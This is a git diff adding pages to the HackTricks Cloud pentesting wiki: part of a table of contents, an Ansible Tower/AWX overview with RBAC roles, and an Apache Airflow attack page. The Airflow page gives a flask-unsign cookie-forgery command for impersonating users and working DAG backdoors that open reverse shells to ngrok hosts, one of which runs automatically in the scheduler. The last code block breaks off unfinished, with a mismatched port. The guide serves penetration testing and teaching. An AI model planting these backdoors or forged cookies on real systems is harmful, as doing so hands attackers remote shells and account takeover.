+    * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
+    * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
+    * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
+    * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
+    * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
+    * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
+    * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
+    * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
+    * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
+    * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md)
+    * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
+    * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
+    * [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
+    * [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md)
+    * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
+    * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
+    * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
+* [Azure Pentesting](pentesting-cloud/azure-security/README.md)
+  * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
+    * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md)
+  * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
+  * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
+    * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
+    * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
+    * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+    * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+  * [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
+    * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
+    * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
+    * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
+    * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
+    * [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md)
+      * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md)
+    * [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-azure-app-service.md)
+    * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
+    * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
+    * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md)
+    * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md)
+    * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
+    * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md)
+    * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md)
+    * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md)
+    * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md)
+    * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md)
+    * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md)
+      * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md)
+  * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
+  * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
+    * [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
+      * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
+      * [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
+      * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
+      * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+      * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
+      * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
+      * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
+    * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
+    * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
+    * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
+    * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md)
+    * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md)
+    * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md)
+    * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
+  * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
+    * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
+    * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
+    * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+    * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
+    * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
+    * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
+    * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
+  * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
+    * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
+    * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
+      * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
+      * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
+    * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+    * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
+    * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
+    * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
+    * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md)
+  * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+    * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
+    * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
+    * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
+  * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
+* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md)
+  * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md)
+  * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md)
+  * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md)
+    * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md)
+    * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md)
+    * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md)
+    * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md)
+    * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md)
+    * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md)
+    * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md)
+    * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md)
+    * [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md)
+    * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md)
+    * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md)
+* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md)
+  * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md)
+  * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md)
+  * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md)
+* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md)
+  * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md)
+  * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md)
+  * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md)
+    * [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md)
+  * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md)
+    * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md)
+    * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md)
+    * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md)
+
+## 🛫 Pentesting Network Services
+
+* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network)
+* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh)
diff --git a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
new file mode 100644
index 0000000000..8098117c1d
--- /dev/null
+++ b/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -0,0 +1,167 @@
+# Ansible Tower / AWX / Automation controller Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows.
+
+**Automation Controller is a newer** version of Ansible Tower with more capabilities.
+
+### Differences
+
+According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
+
+### Tech Stack
+
+* **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
+* **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
+* **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
+* **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
+* **Redis**: Redis serves as a cache and a backend for the task queue.
+
+### Logical Components
+
+* **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
+* **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
+* **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
+* **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
+* **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
+* **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
+* **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
+* **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
+
+### Job Execution Flow
+
+1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
+2. **Job Initiation**:
+   * The user, via the Web Interface or API, initiates a job based on a **Job Template**.
+   * The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
+   * Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
+3. **Job Queuing**:
+   * **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
+   * **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
+4. **Job Execution**:
+   * The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
+   * Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
+   * As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
+5. **Job Results**:
+   * Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
+   * Users can then view the results through the Web Interface or query them via the REST API.
+   * Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
+6. **External Systems Integration**:
+   * **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
+   * **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
+   * **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
+
+### AWX lab creation for testing
+
+[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
+
+{% code overflow="wrap" %}
+```bash
+git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
+
+cd awx
+
+# Build
+make docker-compose-build
+
+# Run
+make docker-compose
+
+# Or to create a more complex env
+MAIN_NODE_TYPE=control EXECUTION_NODE_COUNT=2 COMPOSE_TAG=devel make docker-compose
+
+# Clean and build the UI
+docker exec tools_awx_1 make clean-ui ui-devel
+
+# Once migrations are completed and the UI is built, you can begin using AWX. The UI can be reached in your browser at https://localhost:8043/#/home, and the API can be found at https://localhost:8043/api/v2.
+
+# Create an admin user
+docker exec -ti tools_awx_1 awx-manage createsuperuser
+
+# Load demo data
+docker exec tools_awx_1 awx-manage create_preload_data
+```
+{% endcode %}
+
+## RBAC
+
+### Supported roles
+
+The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
+
+From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
+
+<details>
+
+<summary>Expand this to get detailed description of available roles</summary>
+
+1. **System Administrator**:
+   * This is the superuser role with permissions to access and modify any resource in the system.
+   * They can manage all organizations, teams, projects, inventories, job templates, etc.
+2. **System Auditor**:
+   * Users with this role can view all system data but cannot make any changes.
+   * This role is designed for compliance and oversight.
+3. **Organization Roles**:
+   * **Admin**: Full control over the organization's resources.
+   * **Auditor**: View-only access to the organization's resources.
+   * **Member**: Basic membership in an organization without any specific permissions.
+   * **Execute**: Can run job templates within the organization.
+   * **Read**: Can view the organization’s resources.
+4. **Project Roles**:
+   * **Admin**: Can manage and modify the project.
+   * **Use**: Can use the project in a job template.
+   * **Update**: Can update project using SCM (source control).
+5. **Inventory Roles**:
+   * **Admin**: Can manage and modify the inventory.
+   * **Ad Hoc**: Can run ad hoc commands on the inventory.
+   * **Update**: Can update the inventory source.
+   * **Use**: Can use the inventory in a job template.
+   * **Read**: View-only access.
+6. **Job Template Roles**:
+   * **Admin**: Can manage and modify the job template.
+   * **Execute**: Can run the job.
+   * **Read**: View-only access.
+7. **Credential Roles**:
+   * **Admin**: Can manage and modify the credentials.
+   * **Use**: Can use the credentials in job templates or other relevant resources.
+   * **Read**: View-only access.
+8. **Team Roles**:
+   * **Member**: Part of the team but without any specific permissions.
+   * **Admin**: Can manage the team's members and associated resources.
+9. **Workflow Roles**:
+   * **Admin**: Can manage and modify the workflow.
+   * **Execute**: Can run the workflow.
+   * **Read**: View-only access.
+
+</details>
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/pentesting-ci-cd/apache-airflow-security/README.md
new file mode 100644
index 0000000000..fac6233fbf
--- /dev/null
+++ b/pentesting-ci-cd/apache-airflow-security/README.md
@@ -0,0 +1,201 @@
+# Apache Airflow Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Basic Information
+
+[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
+
+Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
+
+### Local Lab
+
+#### Docker-Compose
+
+You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
+
+#### Minikube
+
+One easy way to **run apache airflo**w is to run it **with minikube**:
+
+```bash
+helm repo add airflow-stable https://airflow-helm.github.io/charts
+helm repo update
+helm install airflow-release airflow-stable/airflow
+# Some information about how to aceess the web console will appear after this command
+
+# Use this command to delete it
+helm delete airflow-release
+```
+
+### Airflow Configuration
+
+Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
+
+{% content-ref url="airflow-configuration.md" %}
+[airflow-configuration.md](airflow-configuration.md)
+{% endcontent-ref %}
+
+### Airflow RBAC
+
+Before start attacking Airflow you should understand **how permissions work**:
+
+{% content-ref url="airflow-rbac.md" %}
+[airflow-rbac.md](airflow-rbac.md)
+{% endcontent-ref %}
+
+### Attacks
+
+#### Web Console Enumeration
+
+If you have **access to the web console** you might be able to access some or all of the following information:
+
+* **Variables** (Custom sensitive information might be stored here)
+* **Connections** (Custom sensitive information might be stored here)
+  * Access them in `http://<airflow>/connection/list/`
+* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
+* List **users & roles**
+* **Code of each DAG** (which might contain interesting info)
+
+#### Retrieve Variables Values
+
+Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
+Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
+
+![](<../../.gitbook/assets/image (164).png>)
+
+However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
+To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
+Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
+
+![](<../../.gitbook/assets/image (152).png>)
+
+#### Privilege Escalation
+
+If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
+
+```bash
+flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
+```
+
+#### DAG Backdoor (RCE in Airflow worker)
+
+If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
+Note that this reverse shell is going to be executed inside an **airflow worker container**:
+
+```python
+import pendulum
+from airflow import DAG
+from airflow.operators.bash import BashOperator
+
+with DAG(
+    dag_id='rev_shell_bash',
+    schedule_interval='0 0 * * *',
+    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+) as dag:
+    run = BashOperator(
+        task_id='run',
+        bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433  0>&1',
+    )
+```
+
+```python
+import pendulum, socket, os, pty
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+
+def rs(rhost, port):
+    s = socket.socket()
+    s.connect((rhost, port))
+    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+    pty.spawn("/bin/sh")
+
+with DAG(
+    dag_id='rev_shell_python',
+    schedule_interval='0 0 * * *',
+    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+) as dag:
+    run = PythonOperator(
+        task_id='rs_python',
+        python_callable=rs,
+        op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
+    )
+```
+
+#### DAG Backdoor (RCE in Airflow scheduler)
+
+If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
+
+```python
+import pendulum, socket, os, pty
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+
+def rs(rhost, port):
+    s = socket.socket()
+    s.connect((rhost, port))
+    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+    pty.spawn("/bin/sh")
+
+rs("2.tcp.ngrok.io", 14403)
+
+with DAG(
+    dag_id='rev_shell_python2',
+    schedule_interval='0 0 * * *',
+    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+) as dag:
+    run = PythonOperator(
+        task_id='rs_python2',
+        python_callable=rs,
+        op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
+```
+
+#### DAG Creation
+
+If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
+
+#### DAG Code Injection
+
+When you execute a DAG from the GUI you can **pass arguments** to it.\
+Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
+That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
+
+All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
+
